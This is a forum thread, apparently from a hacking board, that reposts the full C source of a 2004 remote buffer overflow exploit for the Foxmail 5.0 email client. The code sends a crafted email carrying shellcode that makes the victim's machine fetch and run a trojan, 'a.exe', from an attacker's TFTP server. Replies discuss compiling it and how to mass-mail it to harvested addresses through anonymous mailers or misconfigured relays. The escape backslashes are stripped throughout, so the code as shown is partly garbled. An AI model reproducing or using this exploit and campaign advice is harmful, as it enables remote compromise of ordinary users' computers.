cyrixx
hey ho, i've found this... hope it's not a repost

/* ex_foxmail5.0_windows.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
*
* (C) COPYRIGHT XFOCUS Security Team, 2004
* All Rights Reserved
*
* -----------------------------------------------------------------------
* Author   : xfocus <webmaster@xfocus.org>
*           : http://www.xfocus.org
* Maintain : XFOCUS Security Team <security@xfocus.org>
* Version   : 0.2
*
* Test     : Windows 2000 server GB/XP professional
*                 + Foxmail 5.0.300.0
* Notes     : published vul.
* Greets   : all member of XFOCUS Security Team.
* Compile   : cl fmx.c
* Usage     : fmx <mail_addr> <tftp_server> <smtp_server>
*             mail_addr: email address we wantto hack
*             tftp_server: run a tftp server and have a a.exe trojan
*             smtp_server: SMTP server don't need login, we send the email thru it
*
* Date     : 2004-02-27
* Revised   : 2004-03-05
*
* Revise History:
* 2003-03-05   call WinExec() addr of Foxmail.exe module to run tftp for down&execute
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

//mail body, it's based on a real spam email, heh
unsigned char packet[] =
"From: %srn" //buffer to overrun
"Subject: Hi,manrn"
"MIME-Version: 1.0rn"
"Content-Type: multipart/mixed; boundary="87122827"rn"
"rn"
"rn"
"--87122827rn"
"Content-Type: text/plain; charset=us-asciirn"
"Content-Transfer-Encoding: 7bitrn"
"rn"
"Trn"
"rn"
"--87122827rn"
"Content-Disposition: attachmentrn"
"Content-Type: Text/HTML;rn"
"   name="girl.htm"rn"
"Content-Transfer-Encoding: 7bitrn"
"rn"
"<html></html>rn"
"--87122827--rn"
"rn"
".rn";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)
unsigned char winexec[] =
"x83xecx50xebx0cxb9x41x10xd3x5dxc1xe9x08xffx11xebx08x33xdbx53xe8xecxffxffxff";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
unsigned char winexec2[] =
"x83xecx50xebx0cxb9x41x10xa3x5dxc1xe9x08xffx11xebx08x33xdbx53xe8xecxffxffxff";

#define SMTPPORT 25
int   Make_Connection(char *address,int port,int timeout);
int   SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode);

int main(int argc, char * argv[])
{
   WSADATA WSAData;
   char *mailaddr = NULL;
   char *tftp = NULL;
   char *smtpserver = NULL;

   if(argc!=4)
   {
       printf("Usage: %s <mail_addr> <tftp_server> <smtp_server>ne.g.:%s eeye@hack.com 202.2.3.4 219.3.2.1n", argv[0], argv[0]);
       return 1;
   }
   mailaddr=argv[1];
   tftp=argv[2];
   smtpserver=argv[3];

   if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
   {
       printf("WSAStartup failed.n");
       WSACleanup();
       exit(1);
   }
   
   //WinExec() address
   SendXMail(mailaddr, tftp, smtpserver, winexec);   //WinExec() address in Foxmail.exe module(foxmail 5.0.300)
   SendXMail(mailaddr, tftp, smtpserver, winexec2);   //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

   WSACleanup();

   return 0;
}

//   建立TCP连接
//   输入:
//       char * address   IP地址
//       int   port       端口
//       int   timeout     延时
//   输出:
//   返回:
//       成功 >0
//       错误 <=0    

int Make_Connection(char *address,int port,int timeout)
{
   struct sockaddr_in target;
   SOCKET s;
   int i;
   DWORD bf;
   fd_set wd;
   struct timeval tv;

   s = socket(AF_INET,SOCK_STREAM,0);
   if(s<0)
       return -1;

   target.sin_family = AF_INET;
   target.sin_addr.s_addr = inet_addr(address);
   if(target.sin_addr.s_addr==0)
   {
       closesocket(s);
       return -2;
   }
   target.sin_port = htons(port);
   bf = 1;
   ioctlsocket(s,FIONBIO,&bf);
   tv.tv_sec = timeout;
   tv.tv_usec = 0;
   FD_ZERO(&wd);
   FD_SET(s,&wd);
   connect(s,(struct sockaddr *)&target,sizeof(target));
   if((i=select(s+1,0,&wd,0,&tv))==(-1))
   {
       closesocket(s);
       return -3;
   }
   if(i==0)
   {
       closesocket(s);
       return -4;
   }
   i = sizeof(int);
   getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
   if((bf!=0)||(i!=sizeof(int)))
   {
       closesocket(s);
       return -5;
   }
   ioctlsocket(s,FIONBIO,&bf);
   return s;
}

//send magic mail
int   SendXMail(     char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
   SOCKET   csock;
   int     ret,i=0;
   char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
   csock = Make_Connection(smtpserver, SMTPPORT, 10);
   if(csock<0)
   {
       printf("connect err.n");
       exit(1);
   }

   memset(buf, 0, sizeof(buf));
   ret=recv(csock, buf, 4096, 0);
   if(ret<=0)
   {
       printf("recv err.n");
       exit(1);
   }
   printf(buf);

   ret=send(csock, "HELO serverrn",strlen("HELO serverrn"), 0);
   if(ret<=0)
   {
       printf("send err.n");
       exit(1);
   }
   memset(buf, 0, sizeof(buf));
   ret=recv(csock, buf, 4096, 0);
   if(ret<=0)
   {
       printf("recv err.n");
       exit(1);
   }
   printf(buf);

   ret=send(csock, "MAIL FROM: info@sina.comrn",strlen("MAIL FROM: info@sina.comrn"), 0);
   if(ret<=0)
   {
       printf("send err.n");
       exit(1);
   }
   memset(buf, 0, sizeof(buf));
   ret=recv(csock, buf, 4096, 0);
   if(ret<=0)
   {
       printf("recv err.n");
       exit(1);
   }
   printf(buf);
   
   sprintf(tmp, "RCPT TO: %srn", mailaddr);
   ret=send(csock, tmp,strlen(tmp), 0);
   if(ret<=0)
   {
       printf("send err.n");
       exit(1);
   }
   memset(buf, 0, sizeof(buf));
   ret=recv(csock, buf, 4096, 0);
   if(ret<=0)
   {
       printf("recv err.n");
       exit(1);
   }
   printf(buf);
   Sleep(1000);
   
   ret=send(csock, "DATArn",strlen("DATArn"), 0);
   if(ret<=0)
   {
       printf("send err.n");
       exit(1);
   }
   memset(buf, 0, sizeof(buf));
   ret=recv(csock, buf, 4096, 0);
   if(ret<=0)
   {
       printf("recv err.n");
       exit(1);
   }
   printf(buf);

   printf("send exploit mail...n");
   memset(sbuf, 0, sizeof(sbuf));
   memset(buf, 0, sizeof(buf));
   memset(buf, 0x41, sizeof(buf)-1);
   memset(tmp, 0, sizeof(tmp));
   //strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
   strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
   strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");
   sprintf(tmp1, tmp, tftp);
   memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
   *(int *)(buf+0x100)=0x7ffa54cd;   //ret addr jmp esp
   *(int *)(buf+0x104)=0x80eb80eb;   //jmp back
   *(int *)(buf+0x108)=0x7ffdf220;   //writeable addr
   *(int *)(buf+0x110)=0x7ffdf220;   //writeable addr
   memcpy(buf, "girlx0d", 5);
   sprintf(sbuf, (char *)packet, buf);

   ret=send(csock, sbuf,strlen(sbuf), 0);
   if(ret<=0)
   {
       printf("send err.n");
       exit(1);
   }
   memset(buf, 0, sizeof(buf));
   ret=recv(csock, buf, 4096, 0);
   if(ret<=0)
   {
       printf("recv err.n");
       exit(1);
   }
   printf(buf);
   printf("exploit mail sent.n");
   closesocket(csock);
   return 0;
}
night^man
some will compile it plz ?
Trackmaster
Foxmail is one of the most popular Internet email client, especially in China, more than 3 million people are using Foxmail to handle their email everyday, and the English version is also widely used in more than 20 countries.


alot of scare stories about foxmail so i dont know how many hosts will use this
Heater
Compiled
usch
nice work m8 , but is there a way to massive exploit this?for example like imail ?
u would need to perform a banner scan on port 25 and then read the email adresses out.is that possible???

so long
brOmstar
The vulnerability is on the client side so why u wanna check port 25 and do a bannerscan??

If I'm not wrong the Exploit sends a special crafted mail over a specified SMTP-Server to the client allowing u to specify a tftp-server from which then the file a.exe is downloaded and executed.

Is that right?
ilnctm
wow thanx this is pretty good thanx for the find
morbido
does this exploit works ????
post your report
thankz
Sp00ky
this is nice thnx alot... btw i'm still a trial member so i can't post a new treat for this:

i heard from someone there is an updated dameware source code just now....
i searched the net but can't find it anyone had any luck???
brOmstar
u mean this here?

http://www.governmentsecurity.org/forum/in...?showtopic=7408
_ET_
Hmm looks nice... I didn't get much from imail.. gonna test it tomorrow... not now.. to tired after 3.5 hours gamin' tongue.gif\

Report will follow.
DaClueless
That is a small shellcode:

"x83xecx50xebx0cxb9x41x10xd3x5dxc1xe9x08xffx11xebx08x33xdbx53xe8xecxffxffxff"

Sp00ky
anyone tried it yet? cause i didn't and it looks realy nice to use biggrin.gif
brOmstar
how u want to use that?

i don't understand how u know which victim use foxmail cause it's clientside ITS NOT A SERVER ..u can't check any banner or i'm wrong ??
willywutz
Only way i know is check your incoming mail for the used client or do massmailing
and then check which IPs downloaded your exe from the tftp server.
larsbruggie
yeah that mass mail seems to be the only way, but where the hell do u get emails from, and how do u mass mail them
Niekos
It's just something what just popped in my head:

1. Mass email with that option that he can send a notify, its an option in outlook. (sorry for my (filtered) up english).

2. Check the notify. And look for the fox email thing.

3. Mass mail the fox users with you favourite email program. Or write your own script.
_ET_
Hmmz.. pretty worthless imo.

Mass mailing is not withing my gasps... I could mail all the students on my uni (got axx to the mail database.. but then I'm shure to get caught ... or they will ask me what is going on (so I would have to bust myself hehe) smile.gif

Still waiting on that one cool Windows exploit smile.gif
willywutz
If you have the email adresses of your university u could use anon mailer
or an wrong configured mail host....
_ET_
Yeah I can... but I won't .... it's many friends and it's my education ... not gonna play with them.

They know I have the list .. and they know I can do stuff..... so gues who will be on the suspects list smile.gif
willywutz
I'm sorry, I understood it wrong before.....
Sp00ky
maby a stupid idea but just a thought. isnt there a program that let's you see with mail service the computer is using u are scanning... just like scanline does with the OS of a scanned ip???
usch
retrieving the server is easy by doing a banner scan.but the main problem is to know an email account



so long
brOmstar
usch once again ->ONLY FOR YOU this exploit is for a mail CLIENT ..why do u want to scan for a SERVER-banner ?